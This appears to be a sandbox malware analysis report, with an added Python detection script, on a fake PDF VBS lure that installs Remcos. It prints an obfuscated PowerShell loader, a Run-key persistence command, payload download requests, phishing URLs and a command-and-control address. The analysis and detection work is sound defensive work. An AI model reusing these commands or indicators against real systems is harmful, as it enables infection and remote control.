            • 0x92fb:$s4: +=
            • 0xb418:$s4: +=
            • 0xb702:$s4: +=
            • 0xb848:$s4: +=
            • 0x15fe7:$s4: +=
            • 0x16067:$s4: +=
            • 0x1612d:$s4: +=
            • 0x161ad:$s4: +=
            • 0x16383:$s4: +=
            • 0x16407:$s4: +=
            • 0xc087:$e4: Get-WmiObject
            • 0xc276:$e4: Get-Process
            • 0xc2ce:$e4: Start-Process
            • 0x16c8b:$e4: Get-Process

            System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4868, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", ProcessId: 844, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Motorskib
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1400, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", ProcessId: 4780, ProcessName: reg.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 209.94.90.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1616, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49783
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1616, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", ProcessId: 1400, ProcessName: cmd.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4868, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", ProcessId: 844, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Rdje$progrLMetroOSkeokvHungrgDiaraeAn iaNUn ern ylase
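Each Sigma match above is a single event; what makes this sample obvious is the chain they form: wscript.exe spawning a powershell.exe with a multi-kilobyte command line, msiexec.exe (which has no business doing either) making an outbound TLS connection and spawning cmd.exe, and reg.exe writing a Run value whose REG_EXPAND_SZ data expands an environment variable and then pulls the real payload out of a second registry value (`HKCU:\Software\Fjeldrreder\`, value `dvaergene`). The Python below is an added example for this page, not a Sigma rule and not Joe Sandbox code: it runs a handful of such checks over constructed Sysmon-style events (EventID 1 process creation, 13 registry SetValue, 3 network connection) whose PIDs, images, registry target and Run-key data are copied from the report, and walks the parent chain back from reg.exe. The event field names, the 4096-character command-line threshold, the filler used in place of the real obfuscated PowerShell body, and the explorer.exe / setup.exe rows (benign controls) are assumptions.

```python
import ntpath
import re

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# Run-key data copied from the report: expand %Markoerpositioner%, read the
# payload from another registry value, run it.
RUN_DATA = (r"%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\')"
            r".GetValue('dvaergene');%Markoerpositioner% ($Skan)")
REG_ADD = (r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib"'
           r' /t REG_EXPAND_SZ /d "' + RUN_DATA + '"')
# "x" * 12000 stands in for the ~10 KB obfuscated body of the real command line.
PS_BODY = '"echo $Hles;function Strejflyset' + "x" * 12000 + '"'

# Constructed Sysmon-style events modelled on the Sigma matches in this report.
# The last two rows are invented benign controls.
EVENTS = [
    {"id": 1, "pid": 844, "ppid": 4868, "image": r"C:\Windows\System32\wscript.exe", "parent_image": "",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs"'},
    {"id": 1, "pid": 6212, "ppid": 844, "image": PS64, "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": f'"{PS64}" ' + PS_BODY},
    {"id": 1, "pid": 3592, "ppid": None, "image": PS32, "parent_image": "",   # shown as a root in the report
     "cmdline": f'"{PS32}" ' + PS_BODY},
    {"id": 1, "pid": 1616, "ppid": 3592, "image": r"C:\Windows\SysWOW64\msiexec.exe", "parent_image": PS32,
     "cmdline": r'"C:\Windows\SysWOW64\msiexec.exe"'},
    {"id": 3, "pid": 1616, "image": r"C:\Windows\SysWOW64\msiexec.exe", "initiated": True,
     "dst_ip": "209.94.90.1", "dst_port": 443},
    {"id": 1, "pid": 1400, "ppid": 1616, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Windows\SysWOW64\msiexec.exe", "cmdline": r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD},
    {"id": 1, "pid": 4780, "ppid": 1400, "image": r"C:\Windows\SysWOW64\reg.exe",
     "parent_image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": REG_ADD},
    {"id": 13, "pid": 4780, "image": r"C:\Windows\SysWOW64\reg.exe",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Motorskib", "details": RUN_DATA},
    {"id": 1, "pid": 7001, "ppid": 5000, "image": PS64, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f'"{PS64}" -NoProfile -File C:\\Scripts\\backup.ps1'},
    {"id": 13, "pid": 7002, "image": r"C:\Program Files\SomeApp\setup.exe",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SomeApp",
     "details": r"C:\Program Files\SomeApp\app.exe"},
]

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Run data that expands an env var and then fetches its real payload with
# .GetValue( from another registry value (the "Motorskib" pattern above).
STAGED_PAYLOAD_RE = re.compile(r"%[^%\s]+%.*\.GetValue\(", re.I | re.S)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LONG_CMDLINE = 4096   # assumed threshold; the real command lines here are far longer


def _name(path):
    return ntpath.basename(path or "").lower()


def detect(events):
    """Return (rule, pid) findings for the behaviours this report flags."""
    hits = []
    for e in events:
        img, parent = _name(e.get("image")), _name(e.get("parent_image"))
        if e["id"] == 1:
            if parent in SCRIPT_HOSTS and img in SHELLS:
                hits.append(("script_host_spawns_shell", e["pid"]))
            if parent == "msiexec.exe" and img in SHELLS | {"reg.exe"}:
                hits.append(("msiexec_spawns_shell", e["pid"]))
            if len(e.get("cmdline", "")) > LONG_CMDLINE:
                hits.append(("very_long_cmdline", e["pid"]))
        elif e["id"] == 13 and RUN_KEY_RE.search(e.get("target", "")):
            if img == "reg.exe":
                hits.append(("run_key_set_via_reg_exe", e["pid"]))
            if STAGED_PAYLOAD_RE.search(e.get("details", "")):
                hits.append(("run_key_loads_payload_from_registry", e["pid"]))
        elif e["id"] == 3 and img == "msiexec.exe" and e.get("initiated"):
            hits.append(("msiexec_outbound_connection", e["pid"]))
    return hits


def ancestry(events, pid):
    """Image names from the given process up to the last parent we have an event for."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(_name(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:38s} pid={pid:<5} chain={' <- '.join(ancestry(EVENTS, pid))}")
```

The staged-payload check is the one worth keeping in production: a Run value that is not a path to an executable but a PowerShell one-liner reading its body out of another HKCU value survives file-based scanning and AV cleanup of the dropped script, and the pattern is the same whether the environment variable resolves to powershell.exe or to something else. Expand the benign controls with your own fleet's installers before trusting the false-positive rate.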
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-27T07:44:39.516929+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49784 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:41.360260+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49785 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:43.203606+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49786 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:45.046990+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49787 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:46.905953+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49788 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:48.749246+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49789 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:50.592662+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49790 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:52.435975+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49791 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:54.279314+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49792 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:56.169514+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49793 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:58.012874+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49794 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:44:59.856223+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49795 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:45:01.715159+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49796 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:45:03.558820+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49797 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:45:05.401873+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49798 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:45:07.245237+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49799 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:45:09.088613+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49800 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:45:10.947493+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49801 | 62.171.160.89 | 2404 | TCP
2025-02-27T07:45:15.055959+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49802 | 62.171.160.89 | 2404 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-27T07:44:37.208785+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49783 | 209.94.90.1 | 443 | TCP

            AV Detection

            Source: http://sbtechus.com/zigi/Hengivp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsenp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengip | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/p | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Henp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chm | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/p | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsep | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.cp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigip | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chmpN | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hep | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsensp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.p | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivep | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chmp | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zip | Avira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zp | Avira URL Cloud: Label: phishing
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
            Source: unknown | HTTPS traffic detected: 209.94.90.1:443 -> 192.168.11.20:49783 version: TLS 1.2
            Source: Binary string: .Automation.pdb source: powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdbs source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdba source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49793 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49786 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49785 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49801 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49800 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49787 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49795 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49792 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49794 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49790 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49789 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49798 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49788 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49802 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49796 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49799 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49784 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49791 -> 62.171.160.89:2404
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49797 -> 62.171.160.89:2404
            Source: global traffic | TCP traffic: 192.168.11.20:49784 -> 62.171.160.89:2404
            Source: Joe Sandbox View | IP Address: 209.94.90.1
            Source: Joe Sandbox View | ASN Name: CONTABODE
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49783 -> 209.94.90.1:443
            Source: global traffic | HTTP traffic detected: GET /ipfs/bafybeif4qizmuos6tnbqhccf4cms273spugub5lbtgpc5zaaljfefoarzy/QMpkuY58.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                Host: ipfs.io
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: GET /zigi/Hengivelsens.chm HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                Host: sbtechus.com
                Connection: Keep-Alive
            Source: unknown | TCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: global traffic | DNS traffic detected: DNS query: sbtechus.com
            Source: global traffic | DNS traffic detected: DNS query: ipfs.io
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000002.00000002.127610468902.0000027E93A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png4
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz$
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengip
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsenp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chm
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chmp
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chmpN
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.cp
